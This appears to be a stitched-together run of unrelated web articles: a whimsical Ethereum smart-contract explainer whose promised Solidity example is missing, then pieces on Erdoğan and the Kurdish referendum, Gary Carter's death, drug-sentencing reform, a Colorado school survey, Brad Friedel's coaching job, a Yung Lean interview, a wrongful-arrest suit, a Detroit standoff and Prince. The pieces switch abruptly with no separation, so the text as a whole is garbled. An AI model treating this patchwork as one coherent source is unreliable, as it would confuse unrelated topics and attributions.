And this is where it gets really cool. Deploying a smart contract is like casting a spell. You write up the contract in an arcane magical language (one of the Ethereum programming languages which have esoteric names like Solidity, Serpent, Mutan, and LLL), and summon it into existence. This conjuring requires the use of ether, a magical fuel much like mana in Magic: The Gathering.
Seriously, it's just like magic.
An Ethereum contract is like an enchantment or artifact that anyone can call by sending it ether. People, machines, web services, and anything with a connection to the Internet can interact with the smart contracts that exist on the Ethereum blockchain, a realm that no one entity can control and that is always available because it lives as a decentralized system on thousands of computers around the world. And if you don't want to share your masterful spellcraft with the rest of the world you can lock your contract down so only you can use it.
So what kind of things can you do with smart contracts? Just about anything you are clever enough to code up! You can build a contract for your clan of wizards to pool your ether and store your coven's by-laws, book of shadows, and facilitate proposals and voting (known as a Decentralized Autonomous Organization, or DAO, in the parlance of the non-magical world). Instead of relying on secret handshakes and passwords for entry to your clandestine meetings, you can use a contract to verify membership (in the mundane world this can be used to authenticate online users or control access rights to buildings and rooms like key cards). You can create your own cryptocurrency (your own magical energy) with your own rules governing it. You can create contracts that create other contracts (spells that create new spells). If you're really ambitious you can even create an entire magical world in a contract for others to interact with.
If you've stuck with me so far you're probably itching for something tangible, perhaps an example of what one of these spells looks like. Here is a quick example of a contract written in the Solidity programming language that lets the wizard cast a pretty badass spell:
Okay so I'm being a little vague on the exact details of the “badass wizardry” part of the spell, but this post isn't really about the Solidity programming language so that's all you get for now. However I can tell you a little something about this particular contract. Once it has been created on the Ethereum network only the sorcerer who originally cast it can use it. If any other wizard tries to use it, it will just take their ether and do nothing. The contract also allows the original caster to destroy it if and when he/she wishes.
While you can easily create stand-alone contracts like the one above the greatest value will come from contracts that interact with the real world through mobile and web apps, Internet of Things (IoT) embedded devices, and contracts that interact with other smart contracts in the Ethereum space.
I'll leave you with a word of caution in case you get inspired to build something with Ethereum and look to pitch your idea to investors. Modern finance may be a twisted black art, but VCs don't take too kindly to talk that sounds of witchcraft and Harry Potter. Stick to phrases like “FinTech” and “disruptive innovation” and your pitch will go over much smoother. It's important to remember that Ethereum is cutting edge technology and it should be treated as such, especially when large sums of money are on the line.
But don't worry, despite your tech and business jargon deep down you're really a badass crypto sorcerer.
On Sept. 26, a day after the Kurdish referendum, Turkish President Recep Tayyip Erdoğan gave a harsh speech criticizing Massoud Barzani, the leader of the Kurdistan Regional Government (KRG). Erdoğan questioned what Barzani possibly could be expecting of this referendum given the fact that he cannot pay his own bureaucrats' salaries and had to borrow $1.5 million from Turkey. Erdoğan was disappointed that Barzani did not even bother to consult with him about this referendum. Erdoğan said, “Up until the last minute, we did not expect Barzani to make such a decision [to hold the referendum], but we were wrong. In a time when our relations were at its best, we consider this decision [to be] treachery against our country.” Erdoğan also emphasized his doubts about the voter turnout and legitimacy of the results of the referendum, while repeatedly highlighting Israeli meddling for an independent Kurdistan. Erdoğan warned attempts at Kurdish independence would harm both Turkish-Israeli and Turkish-KRG relations. Still, he did not utter a word about other Arab countries' support toward the KRG.
From his long speech, one sentence particularly struck a chord in Turkish social media. #YineKandirilmislarYetisin (Help, they have been fooled again) started trending immediately with hundreds of satirical comments. The confession of being deceived is a tool Erdoğan frequently uses whenever his brotherly relations collapse. He has used similar arguments for Syrian leader Bashar al-Assad, US President Barack Obama, the Kurdish Peoples' Democratic Party (HDP) and the Fethullah Gulen movement, to name just a few. However, this time comments not only ridiculed Erdoğan, but also were critical and harsh, highlighting the costs of Erdoğan's wrong decisions and misguided policies for the country. In addition, a few courageous columnists such as Ahmet Nesin of the Arti Gercek news portal turned the tables on Erdoğan's argument, stating that the list of “those who were deceived by Erdoğan” is rather long.
Yet the most critical piece came Sept. 27 from Kurdish daily Rudaw, known for its close links with Barzani. (On the day of the Sept. 25 referendum and through an emergency meeting, the Turkish media censorship agency shut down Rudaw and a few other Kurdish outlets.) Rudaw's editor Rebwar Kerim Weli asked, “President Erdoğan, how can you be so gullible?” In Turkey, Weli's words were read widely and published as a de facto statement from Barzani. He asked why Kurds should seek permission from Erdoğan to hold a referendum in Iraq. He bluntly stated that Barzani did not fool Erdoğan; rather, Erdoğan deceived the Kurdish people while seeking the votes he needed to become the president. Weli spoke of Erdoğan's threat to enforce sanctions for the transportation of crude oil from Kurdistan and vaguely questioned why Turkey had not shut down the valve before and stopped its ships from transporting the oil.
Perhaps most striking among Weli's comments was one about the legitimacy of the election. He said, “For your presidential system, the referendum receiving 51.4% vote is seen as legitimate, but not 92% in Kurdistan? Is it because we are Kurdish?”
Unable to digest his failures, Erdoğan could be using the being "deceived” argument as a shield. This is the explanation of scholars such as Timur Kuran, a professor of economics and political science and Gorter Family professor of Islamic Studies at Duke University. He told Al-Monitor: “Erdoğan has been playing victim since the start of his political life. He has cultivated the image of a warm-hearted and trusting person who gets victimized by cunning politicians because of his naivete. His base has bought into this image. Hence, when he says that Gulen, Obama or Barzani tricked him, it resonates with his base. His followers imagine that he negotiated with them in good faith, only to be stabbed [in] the back.” To explain Erdoğan's reasoning, we should look beyond Turkey's national interests but at Erdoğan's survival needs.
On Oct., 1 Erdoğan suggested that the lawmakers of the HDP belong in Iraq's Qandil Mountains — the Kurdistan Workers Party's (PKK's) headquarters. But his advisers have been giving completely different messages. For example, Erdoğan's senior adviser, Ilnur Cevik, said on June 22, “Turkey will face the hurdle of an independent Kurdish state sooner or later. Kurds have the right to build their own state.” He questioned what would happen afterward and commented they would have to wait and see. Praising Barzani as a wily statesman, Cevik said, “They have a plan.” It was in June when Cevik told the public that Turkey is against a referendum because it fears this would lead to further instability, adding, “If Kurdistan declares independence, Turkey will not enforce a blockade. Look at Qatar [referring to the Saudi-led boycott]. We are helping them. In our culture, there is no rest if your neighbor is hungry.” Is this not a statement sufficient to discredit Erdoğan's claim of surprise of the Kurdish referendum in September? Indeed, Erdoğan has allowed not only his advisers but also his party's Kurdish lawmakers such as Galip Ensarioglu and Orhan Atalay to speak up in defense of an independent Kurdistan from Iraq as a “God-given right” that Turkey would not attempt to block.
Yet now Erdoğan bluntly threatens Kurds with hunger by shutting down the oil pipeline and more tacitly with surprise midnight raids. The pro-Justice and Development Party (AKP) media outlets are publishing pieces titled “Barzani cheated his people for votes,” making unsubstantiated claims of chaos and panic in Erbil, Kirkuk, Sulaimaniyah and other cities.
When asked about how we can explain the tense situation between old friends Barzani and Erdoğan, HDP council member Alp Altinors candidly told Al-Monitor that another one of “Erdoğan's vile alliances collapsed.” Altinors said, “Erdoğan utilized public appearances with Barzani as a way to conceal his anti-Kurdish policies, to balance the PKK out and against Shia-controlled Iraq's central government.” It was Erdoğan who signed the 50-year contract with Barzani for the profits of the crude oil pipeline, and again it was Erdoğan's government that officially displayed the Kurdish flag on Feb. 26. This is a country where people have been jailed for wearing the red, green and yellow colors of Kurdistan on the charges of spreading terrorist propaganda.
Altinors added that Barzani also served Erdoğan's anti-Kurdish policies in Turkey. He said, “The spokesperson of the Kurdish Democratic Party [KDP] of Turkey, Rojhad Amedi, made a historic confession that ‘most AKP organizations in the Kurdish cities of Turkey indeed belong to the KDP.' When the AKP razes Kurdish towns like Sur, Sirnak and Cizre to the ground [with the excuse to combat the PKK], the KDP had no concern about openly declaring its full support for the AKP. While the AKP jailed Turkey's Kurdish leaders from parliament as well as members of the local government, Barzani campaigned along with Erdoğan for a "yes" vote on the Apr. 16 referendum [to expand presidential powers]. In the meantime, Erdoğan and his men are worried not only because their one remaining alliance (that with Barzani) in the region is collapsing, but also because their allegation that they are battling the PKK and not the Kurds also ends here.”
Indeed, the PKK and its offshoot, the Kurdistan Freedom Falcons, stopped their operations on urban targets inside Turkey in December 2016. Al-Monitor has learned that the PKK's aim to be removed from the list of terror organizations and the Turkish Intelligence Agency's extensive sweeps in the country have been the two most important causes for the suspension of terror activities. However, senior military and security officials in Ankara are worried that Erdoğan's angry rhetoric could indeed further alienate Kurds both in the southeast and other parts of Turkey.
We can see in Erdoğan's reported dialogue with Hurriyet daily columnist Abdulkadir Selvi that he will adjust the ferocity of his angry outbursts so as not to offend the people of the region. Yet it may be a little more difficult than Erdoğan hopes. One Iraqi businessman who asked to remain anonymous and is heavily invested in Kurdistan told Al-Monitor, “Erdoğan now hopes to ally with Baghdad and Tehran, but he has not kept his promises to either one of them. People here simply are betting to see when and how Erdoğan will flip-flop this time. He has no credibility.” Kurds have not forgotten Erdoğan's indifference about the Islamic State's siege of Kobani, but they also know he will cave immediately if his own survival is at risk.
They lost their damn minds. All of them.
Gary Carter's over the moon, of course. He's just whacked a double over Andre Dawson's head to snap a scoreless tie against the Cubs. The last at-bat of Carter's great career, and he hits a game-winner. The rest of the Expos are also thrilled, predictably.
But the most striking protagonists are the fans. There are 41,802 of them, blowing the roof off Olympic Stadium. It had been an exciting season in Montreal, at least by Expos standards. The team had already been eliminated, though, and Expos fans had shown a tendency to stay away when they had no reason to cheer. Two years earlier, the Expos played their final home game in front of 4,262 die-hards. The year after that, they spent the end of the season on the road, chased from the disintegrating Big O by falling concrete beams.
Not now. Where once there was apathy, now there was bliss.
The death of Carter, who passed away Thursday at the age of 57 from a hyperaggressive form of cancer, has had a profound impact on the baseball community, triggering touching tributes from former teammates, managers, and others who knew him well. If his death was affecting, it's because his life in the game was even more so.
When the Expos got their start in 1969, team president John McHale made it his mission to build the game's premier farm system, with the best scouts and best instructors producing the best young players. Guys like Dawson, Tim Raines, Larry Walker, and Vladimir Guerrero all came up through the system, then became superstars in the big leagues.
Carter shone brighter than all of them. Part of that was sheer ability. He earned a reputation as an elite defender, transitioning from his early career as a near-full-time outfielder to a three-time Gold Glove winner behind the plate. His overall numbers ranked with Johnny Bench, Carlton Fisk, and Yogi Berra (and later Ivan Rodriguez and Mike Piazza) — among the greatest catchers of all-time.
But Carter also had a sense of ease in the spotlight. And as his star grew, he attracted hordes of fans.
“Gary was always available to the fans,” recalled Marcia Schnaar, an administrative assistant who was hired in the Expos' inaugural year and stayed until the last day, 35 years later. “His agent told him, ‘These are the people who pay your salary; be there for them.' But I didn't see it as forced. It was genuine. He enjoyed talking to people. Especially all the little boys and girls who came to see him.”
Those encounters stuck with his admirers. With team employees, too. Soon after Carter broke into the majors, he struck up a friendship with batboy Daniel Plamondon, Carter helping Plamondon with his homework, Plamondon teaching a receptive Carter the basics of spoken and written French.
Years later, Scott Abramovitch got to know Carter briefly, serving as a batboy himself during the '92 seasons, Carter's comeback year in Montreal.
“Here's what blew my mind,” Abramovitch recalled. “I see him again five years later. He remembered my name. He remembered my family. He wanted to know everything. That's the kind of guy he is. People talk about someone like Bill Clinton, the charisma he had, the way he used to connect with people. Carter had that same ability.”
Not everyone admired Carter's ebullient personality. Lesser-paid (but equally or more talented) teammates at times seemed to resent his attention-grabbing. Carter earned derisive nicknames from his fellow players, including “Lights” for his camera-ready, media-friendly smile. Even his trademark moniker, “The Kid,” was a jab at the excessive enthusiasm he showed during spring training drills the year before he cracked the big leagues. Occasionally, the resentment would boil over.
“You see one thing about Gary,” Dawson told author Dan Turner 30 years ago. “He knows how to promote himself. He knows how to sell himself.”
That Carter sold himself wasn't something that bothered ownership. At least not at first. But as Carter continued to reel off All-Star seasons and salaries escalated throughout the game, Expos owner Charles Bronfman began to realize he'd soon no longer be able to keep him. After the 1984 season, the Expos traded Carter to the Mets for four players: Hubie Brooks, Floyd Youmans, Mike Fitzgerald, and Herm Winningham.
The trade to the Mets was the first in a long line of deals that pushed star players out of town due to escalating salary demands. Years later, Bronfman sold the team to a cheap and feckless local ownership group, eventually leading to the team's move to D.C. and the end of big league baseball in Montreal.
Carter's impact in New York was nearly as profound. Already loaded with young talent, the team reaped instant dividends from Carter's arrival, starting with a walk-off homer in his first game as a Met at Shea. Even as he fought mounting knee injuries and surgeries, Carter continued to thrive in Queens, blasting 32 homers in 1985 and finishing sixth in league MVP voting. He regressed somewhat the next year, but gained such a halo effect as one of the leaders of the loaded '86 Mets that he finished third in MVP balloting.
One of Carter's signature moments came in Game 6 of the World Series. With two outs, nobody on, and the Mets trailing by two, Carter got ahead of Red Sox closer Calvin Schiraldi, then laced a single to left to keep the Mets' season alive. You've probably heard about what came afterward.
Even on a World Series-winning team, Carter had his share of detractors. He was mocked by some teammates for his straight-and-narrow ways, and his constant smile and enthusiasm rubbed some the wrong way.
“We all disliked Gary when we played against him,” Keith Hernandez told The New York Times. “He was just a little rah-rah varsity collegiate type, even though he didn't go to college. But I respected him as a player. And when he came to New York, I appreciated him, too.”
Two completely different fan bases were devastated by Thursday's news. Mets fans reminisced over Carter the veteran, while Expos fans feted the young buck who powered the first successful teams the franchise had ever known.
But Carter's passing was even more poignant than all that. It made those who knew him reflect on his life, and their own. It made them regret mistakes they'd made, made them wish they could be better people.
In an interview with WFAN, Darryl Strawberry's message was succinct: “I wish I could have lived my life like Gary Carter.”
"Mandatory sentences breed injustice," Judge Roger Vinson told the New York Times. A Ronald Reagan appointee to the federal bench in Florida, Vinson was railing against a federal system that forced him to sentence a 27-year-old single mother to prison life without parole because her dealer ex-boyfriend had stored cocaine in her house.
Note to D.C. Republicans: This would be a great time to take on the excesses of the war on drugs.
The Times were writing about conservatives, including Jeb Bush and former Watergate conspirator Chuck Colson, who advocate for smarter, more humane incarceration policies under the rubric "Right on Crime." In light of the GOP's need to woo more young voters, drug-war reforms offer an ideological good -- limited government -- and also might be politically savvy. Think: Ron Paul and his rock star status on college campuses.
Two areas cry for immediate action.
One: Sentencing reform. The single mother, Stephanie George, had prior drug convictions, which contributed to her draconian prison term. Even she says that she deserved to do time, but not the rest of her natural life.
What's more, her costly incarceration won't do anything to dry up the nation's drug supply or scare kingpins straight. Career dealers, like George's ex-boyfriend, who was released five years ago, know how to game the system and reduce their sentences by testifying against amateurs and patsies who think they can win at trial. As the judge explained, the guiltiest parties "get reduced sentences, while the small fry, the little workers who don't have that information, get the mandatory sentences."
When the federal government imprisons small-time criminals for life, the system grows too costly and too ineffective. It embodies the definition of big government. University of Chicago economist Steven Levitt found that American penal policies decreased crime in the 1990s. Since then, incarceration rates have risen so steeply that Levitt told the Times he now thinks that the prison population -- more than 2 million people are in prison or jail -- could be reduced by a third. If he's even half right, Washington should act.
President Obama was critical of mandatory minimums before he was elected to the White House. But he has failed to use his presidential power to pardon as he should. Obama has commuted only one sentence to date, and right now, a commutation is George's only hope of release.
Julie Stewart, who founded Families Against Mandatory Minimums, knows Democratic and Republican politicians who have issues with the war on drugs. Congress should not wait on the White House to enact sentencing reform; GOP members should lead the way.
Two: Marijuana. Though the Obama administration has rewarded sanctuary cities that choose to flout federal immigration law, the Obama Department of Justice has had a no-sanctuary approach to medical-marijuana dispensaries in states where voters have legalized medical use. In California, U.S. attorneys have gone to extremes, seizing assets without prosecuting dispensaries and suing landlords who aren't even distributing the drug.
In November, Washington and Colorado voted to legalize possession of up to 1 ounce of marijuana. Rep. Mike Coffman, R-Colo., opposed the Colorado measure, but he supports the Respect States' and Citizens' Rights Act of 2012, which would exempt states with medical or recreational marijuana laws from the Federal Controlled Substances Act. Is Coffman ahead of Obama?
The administration has announced no policy change. Talking to ABC on Friday, Obama reiterated his 2008 view that arresting recreational users should not be a priority and said he does not support legalizing marijuana "at this point."
Marijuana Majority's Tom Angell is not impressed. "The federal government rarely goes after individual users," he noted in a statement. "The real question is whether the Obama administration will try to prevent voter-approved marijuana sales systems from being enacted or if they will force individual users to buy marijuana from the black market, where much of the profits go to cartels and gangs that kill people." And: The executive branch should reschedule marijuana under the Controlled Substances Act.
"We want to put away the bad guys," former California GOP Assembly leader Pat Nolan, who served time in federal prison and now works for the Prison Justice Fellowship, stressed, but the federal system no longer is limited to hard time for hard crimes. Still, Nolan sees more conservative support for sentencing reform on the state level than on Capitol Hill.
It's time for a change. Smart conservatives should fight for government that works and an end to laws that do not. Compassionate conservatives must stand against laws that are harder on small fish than career criminals. Fiscal conservatives should oppose the policies that burn dollars without promoting public safety. Constitutional conservatives should stand up for states' rights.
And young conservatives instinctively understand this.
From bereanresearch.org
I recently received an email from a listener about a very disturbing assignment given in the Aurora Public School District in Colorado:
“Attached is an assignment given to my 12-year-old great-nephew in his 7th grade social studies class. It is an outrage, and I'm so proud of my niece (his mom) who was able to articulately respond why this assignment is so inappropriate for this age group – and unlawful to request a family private beliefs/information.”
The assignment was titled, “Righty or Lefty?”
Here are the instructions, followed by just a few of the examples of survey questions under the headings, Guns, Abortion, Crimes & Punishment, Environment, Health Care, Education, Free Speech & Religion, Gay Marriage, Defense, and Taxes. Notice the subtle tone:
Each student was asked to tally his or her score and determine where on the scale between the two extremes they landed. And finally, the request for parents to take the survey too. This was enough for the mom, who wrote her response:
Here is the transcript of the letter to the school:
I am appalled by the “Righty or Lefty” poll. First of all it is nobody's business what mine or my 12-year-old son's political views are. Secondly, my own son does not even know what half of these issues mean until after discussing them with him. His answers vary greatly during discussion. His views will always change as he grows and as new issues arise and he learns that these things have an effect on his life. As I am reading these topics, I have noticed the entire thing is pro-Liberal and con-Conservative, being completely skewed towards “Lefty-nicey/meany conservatives” ideology, which I do not approve of. The entire thing is unbalanced and an unfair and inaccurate representation. My family is NEITHER and I do not appreciate you nor the school trying to pawn this assignment off on students who are too young to have valuable opinions on these subjects! I do not know what importance this has as being an assigned worksheet for a “major grade” (has he has informed me). I do not want to hear about it being for a government assignment! Learning about government is one thing – but it is none of your business to try and pry personal information out of a child on extremely private information. I am excusing my son from this assignment and expect this NOT to be counted against his grade. Sincerely, _____.
The great-aunt of the student concludes,
If this assignment doesn't necessarily fit the Common Core agenda, it certainly fits the agenda of those collecting private information on students and parents for the Jeffco School District nearby here in CO by a grant from the Gates Foundation. This assignment is clearly an attempt to collect private data from my niece and her family through her 12 year old son.
We are attempting to contact the district for further comment as to whether this is part of the Common Core curriculum, or simply a teacher who thought this survey might be a good idea.
This article orgianlly posted here.
Brad Friedel was named head coach of the new United States under-19 squad.
Former United States goalkeeper Brad Friedel will begin his head coaching career as the leader of the U.S. under-19 team, U.S. Soccer announced on Monday.
Friedel, 44, retired with Tottenham in May after a long career in England during which he also played for Liverpool, Blackburn and Aston Villa.
Omid Namazi, a former assistant for Iran, was also hired to coach the under-18 squad.
"We are thrilled to bring on two guys who have such tremendous experience," said U.S. coach Jurgen Klinsmann. "Brad Friedel played at the highest level for almost two decades, and his knowledge will be a huge benefit to our young players.
"Omid Namazi has not only been a professional player at all levels in the United States, he has worked as a coach both here and overseas which adds important perspective.
"They have both been assistant coaches in our youth national teams, so this is another important step in connecting the dots between our teams."
Friedel was on three World Cup squads and earned 82 caps before announcing his international retirement in 2005. He holds the Premier League record for most consecutive appearances with 310.
"I look forward to the opportunity to help develop our young players into professionals and full internationals," said Friedel. "The last four years I have focused my coaching at the academy and development levels, and I'm excited to work with the entire group of committed Youth National Team staff members to increase our levels of development here in the United States."
The new Under-19 squad, which features players from last year's Under-17 World Cup, will play their first games later this month in the Copa del Atlantico in the Canary Islands.
Namazi has been an assistant coach with the U.S. under-20 side for the past two years after helping Iran qualify for the 2014 World Cup.
"I look forward to leading such a critical age group in our youth national teams set up," Namazi said. "My experience with the U-20s in the last two years will certainly help me develop the type of players we need to compete at the highest levels professionally and internationally."
This is why I wanted to interview rapper Yung Lean, born Jonatan Leandoer Håstad (c. 1996) in Stockholm, Sweden.
I was born in the 90's fuck the 80's! — yung lean (@yungleann) February 4, 2015
This cuts deep. This makes me feel old. Creaky, even. Sure, his SoundCloud popularity, his Internet cult fame, his musical stylings, and the fact that his crew calls themselves the Sad Boys all intrigued me. But really, I just needed to talk to this 18-year-old and get a sense of what that life is like at this moment in time.
Lean was briefly in Austin for SXSW, playing a perfectly SXSW event — Tumblr's annual SXSW Fuck Yeah Party, sponsored by Entourage, as in the show/movie/ideology Entourage. We spoke across the street from the venue, tucked away from his fans.
I was expecting not to like Yung Lean. Most of my interactions with 18-year-olds take place on the New York City subway once's school is out, as they loudly sniff out prey to terrorize for 10 to 12 stops across the five-borough region. Eighteen-year-olds are up there among my least-favorite people on earth. But I also knew it could go the other way, and I'd leave unofficially adopting Lean as my younger brother and taking to occasionally leaving inspirational quotes on his Facebook wall.
There really was no way to tell until I showed up and talked to the Sad Boy himself.
Is this your first time coming to South by Southwest?
Yes.
What did you know about it going in?
I know it's a festival. I know some people that throw parties here. I've heard that it used to be better a couple years back — more local and stuff. I know it's kind of a private thing as well — it's like, all the fans can't get into stuff. But it depends on what company you play for, I guess.
I look at it as—
It's very industry.
Yeah.
More Grantland Q&As Click here for all of our interviews with fascinating people from the worlds of sports and pop culture. That's why we said no last year, actually. When I started really getting into music and shit, stuff like The Fader and Fader Fort, there were a lot of Swedish bands playing here in, like, 2009. You remember the Tough Alliance cover? And all of them probably played S-X-S-W.
How'd you determine which events to play down here? Why'd you pick the Tumblr showcase?
I wanted to participate in all South by Southwest, but had to leave early for Tokyo Fashion Week, so at the end of the day it was a scheduling issue. But it was good to collaborate with Tumblr on the party.
One of the things I like about Austin during this time of the year is running into people I know in the streets. It's an overwhelming week, so I think you can be cynical about it, but it's also fun.
You feel the heart of Texas here in the streets. It's good. We were just in New Orleans for three days, for Super Sunday.
s/o Missippi s/o New Orleans # — yung lean (@yungleann) March 15, 2015
New Orleans might be the most fun place in America.
I fuck so hard with it. Everyone's so nice. We recorded a bunch of songs there, with some of the engineers from Young Money/Cash Money, in this beautiful house. We don't have that vibe of community. They have little yard parties and whatnot.
I moved out of my parents' house to a place that's more like, the projects, because I'm living by myself.
How far is it from where you grew up?
It's 17 minutes, with the subways. That's like 10-12 stations. It's by where I used to buy alcohol when I was 15 — the places where the parents say “don't go.” But everyone is really nice. And I felt that vibe in New Orleans; some parts of Stockholm are like that.
Atlanta, which is where I'm from, has similar aspects. You have been down there?
Yeah. We played a show out there. I want to go back there and just work. Be there for like a week. That's the most interesting rap city right now. I've worked with Metro [Boomin] and I'm in touch with Sonny Digital. I just want to go down there and feel the vibe. We were there and just played and left. We rode through the city, though. Did have a good time.
People really get into shows down there.
They were going HAM. Every fan was kind of special; we were doing meet-and-greets and shit and would just bring in all these kids, and it was great to just chill with them. And they were all really into it.
Are you working with or close with any of the Atlanta rappers?
I'm good friends with OG Maco — keep in touch with him.
I think the Awful Records crew with Father are great.
Oh yeah, me and Father were going to link up in Miami, but I don't know what happened. They're going to take over. But on the other side, it's also fun. Peewee Longway, Jose Guapo, they're really good as well.
How many are you traveling with, typically?
At the most, 20.
How many people came to Austin?
From my crew, five. Because we're just working on a mixtape in the U.S. right now. So five Swedish boys. But when we're on tour, we got more of a crew.
How long are you in the States?
We came to the U.S., did three shows, and then we just stayed in Miami for a month, just working. Now we're just doing one-off dates. We just go to a city, play, get out. Just to make money, and not to tour. Touring tears you down. It's fun to go around the world with your friends, but physically and mentally it's like …
Two summers ago, I drove around the country for Grantland. And the one thing I didn't realize until that moment is how tiring it is to just sit, for hours.
That's the tiring part. I get energy from this — performing. I get energy from meeting people. Sitting, and standing up, and holding your passport and luggage, that's what tears you down. You can't be relaxed. If you fall asleep, you have to wake up in an hour. That's where the health stuff starts.
So the playing of the show is actually the recharge?
That's what I get energy from.
One thing that I think is unique about you is where you're doing shows. Most people touring internationally don't get to that point until they're at the very top. But you're doing SXSW, going around the U.S., but also doing shows in Russia, in Mexico.
I'm really like a rat in the rap game. I just drop stuff when I feel like it. Yes, I'll do a tour and wear myself out, and drop an album to do the tour, and go crazy off that. But this isn't the peak. I want to work and build a career that's steady so I can live off this and still do what the fuck I like. I was like, I want to go to places like Mexico and Russia. And if you get that opportunity, you have to say yes. I have so much respect for people out there, just talking to locals, doing local shit like playing bars in Mexico City, drinking mescal with these 50-year-old punk guys. My people getting talked to by the police for pissing in the street. Just riot shit, rock star.
SBE just touched in Iceland , Reykjavik — yung lean (@yungleann) February 14, 2015
You're 18, right?
Yeah. I can retire at a good age and still feel like I've done something. I'll probably be depressed as fuck when I'm 30.
Don't think about 30.
Fuck that. Fuck 30.
I'm 27.
Yeah, 30 doesn't exist.
I'm looking at you, losing my mind that you're 18. There are people a little older than I am who are looking at me crazy for being at SXSW so long. But there's this idea that I constantly think about, which is this idea of doing it while you can.
That's the motto. Doing it now. You just did an interview with Obama; what if you had postponed that — nah, I can't get to Washington.
Sorry, I have a meeting.
Nah, it's too tiring, Obama.
It was great though.
I wanted to ask you about that. You don't have to put it in the interview, but how was it?
It was stressful, but I think all the other things I'd done up until that point helped prepare me for it. So that felt nice.
Like the last boss. Like final boss.
Exactly. Final boss in the video game.
That's a really good synonym because you walk through all those rooms and people guide you and then you just go into a big room and there's one thing to do. You're seeing him. He's right there.
Exactly. Also, if you ever get a chance to fly on a presidential plane, I suggest you say yes.
You know there's one Swedish band that has met the president.
Who?
Ace of Base. They met what's his name — Clinton. He was a fan.
When Christian Giraldo tried to break up with his girlfriend, the former Marine says she became combative — and he became a victim of domestic abuse.
But when Hollywood police responded to Giraldo's 911 call, he was the one who got cuffed and carted off to jail.
Now Giraldo, 28, is suing the city of Hollywood for wrongful arrest.
His lawsuit, filed in U.S. District Court in August, accuses the police of arresting him in September 2013 without reading him his Miranda rights or taking into account his side of the story. The suit also accuses the department of discriminating against men who are victims in domestic abuse cases.
"Our client's version of events is dramatically different from what [his ex-girlfriend] told the police," said Jeremy Harris, an attorney representing Giraldo. "He was the only one with any marks on him. We take issue with the fact that just because he's the male, he gets arrested."
Hollywood spokeswoman Raelin Storey said the city intends to vigorously defend the case.
Police union leader Jeff Marano defended the officers and believes the lawsuit will be dismissed.
When the criminal case against Giraldo went to trial, a jury found him not guilty.
Giraldo's lawsuit says his girlfriend, Aurora Hernandez-Calvino, attacked him on Sept. 29, leaving him with a torn shirt and red marks on his neck.
Minutes after Giraldo called 911, four officers showed up at the couple's apartment on Van Buren Street. One had gone to high school with Giraldo's girlfriend.
The woman told officers that Giraldo had broken a remote control and pinned her on the bed, refusing to let her leave. She said his shirt was torn when she struggled to get free.
The police report says Giraldo struck his girlfriend but adds there were no signs of physical abuse on either party.
In police records, the responding officers describe Giraldo as combative. In his lawsuit, he accuses them of being rude and abusive.
Giraldo's lawsuit says he complained to another officer about Officer Raul Toledo's aggressive tone.
According to the lawsuit, Toledo handcuffed Giraldo and forcefully escorted him from the apartment. In the hallway, Toledo asked Giraldo if he was a Marine. When Giraldo replied he was, the officer snapped: "Then from one Marine to another, shut the f--- up!"
In a letter to the department, Giraldo wrote: "I was so scared and shocked that all I could do was try to explain once more that I had done nothing wrong and that I was the one that called for help."
Giraldo's letter accuses his ex-girlfriend of concocting a fictitious story and accuses Toledo of cursing at him and making a false arrest.
After his trial, Giraldo complained to Internal Affairs.
Toledo denied Giraldo's claims and told Internal Affairs he was worried the violence might escalate if he did not arrest Giraldo.
Internal Affairs determined that Toledo had acted within the scope of the law and department policy.
sbryan@sunsentinel.com or 954-356-4554
Buy Photo Police believed two suspects were in a house in the 1000 block of Wheelock following a robbery at a Redford Township motel Monday. (Photo: David Coates / The Detroit News)Buy Photo
Detroit — After a nearly 12-hour standoff between barricaded robbery suspects and police, no one appeared to be in the house where the suspects were thought to be holed up on Wheelock in southwest Detroit.
Redford and Michigan State Police had been staking out the house in the 1000 block of Wheelock following a robbery of a woman at a Redford Township motel early Monday morning.
At least two, and possibly three suspects, were believed to have fled the robbery and ended up at the home near Interstate 75 and Springwells. One suspect surrendered from the home in the morning and was turned over to Redford police.
For hours, police attempted to negotiate with the other suspect or suspects believed to still be in the house, but they got no response. Police entered the home around 2:30-3 p.m. — but no one was inside.
“We are still actively trying to locate the suspects in this dwelling,” Michigan State Police Lt. Calvin Hart told reporters around 4 p.m. “No suspect has been located in this particular dwelling. We do have one individual that did surrender. So this is ongoing. We are still attempting to clear the dwelling to make sure any hiding spaces are properly searched.”
The scene at one point involved at least 12 State Police cruisers in position at Lafayette, a tactical truck, a bomb squad and a canine unit from the Bay City Police Department. Police advised neighbors to stay inside their homes as officers used explosions devices to get the suspects to respond.
It also led to the lockdown of nearby Roberto Clemente Academy. Parents came and picked up their children.
Earlier in the afternoon, Principal Maria Hernandez-Martinez said, “The students are safe.”
Asked how to respond to concerns that there might be armed robbers still in the community, Hart said police were doing everything they can.
“It still remains a concern that they are not in this house,” Hart said. “(We wanted to) make sure that the community is safe. That's why we took every step here today.”
HFournier@detroitnews.com
(313) 223-4616
@HollyPFournier
Read or Share this story: http://detne.ws/1Qr1TjO
In the 1990s, Fafu moved to Minneapolis, where his dad was living, to pursue music, chasing the funk scene that you see in Purple Rain. There, he met and befriended Michael Bland, who was Prince's drummer at the time. In 1995, when Prince needed new drum programming for his live show, Bland recommended his friend, kicking off a working relationship that spanned two years and plane rides across the globe, touring with the New Power Generation. This is what Fafu remembers.
The first time I actually met him? He's a peculiar guy—you don't really meet him, you know? It's not like you shake his hand. Minneapolis' music scene is a small community and I'd been hanging around with his drummer for probably a year before I got out to Paisley Park; by then, I'd heard a million stories. Everybody's crossed his path at least once. There are rules, almost. Sound guys and guitar techs—those were the two positions were you'd get fired immediately. If you looked him in the eye and tried to shake his hand, you were gone that day. If you made it past two weeks, then you'd probably get to stick around. He was a rock star, coming off that '80s run. In the mid-'90s, he'd isolated himself.
POST CONTINUES BELOW
The drummer, Michael Bland, told me there were three new songs he wanted to play and I had to get whatever drum programming they were using in the studio, sample it, and put it into the system. But Prince also wanted it to sound like the band was performing remixes, wanted it hyped up, so I added my own flavor. Prince liked what I did and said, “Have that guy come back and remix everything.” So I added my own sound to all 50 or so tracks they were doing live at the time.
The first time we talked was at the sound stage at Paisley Park. He wanted to go over everything, give me comments and notes.
He's so confident on stage, but it's basically the opposite when you talk to him. He mumbles, he'd stutter a little bit, he'd look down. But when it came to doing the work, he always knew what he wanted. He was so confident in his abilities—even beyond music. He had a tennis court on his property but he never played tennis. Then somebody would say, “Oh, I want to play you.” So Prince would send for his tennis gloves, was completely insane on the court and would beat whoever he was playing. I never saw Prince make a mistake—in anything.
POST CONTINUES BELOW
Imagine being in his band. He could play every instrument better than the band.
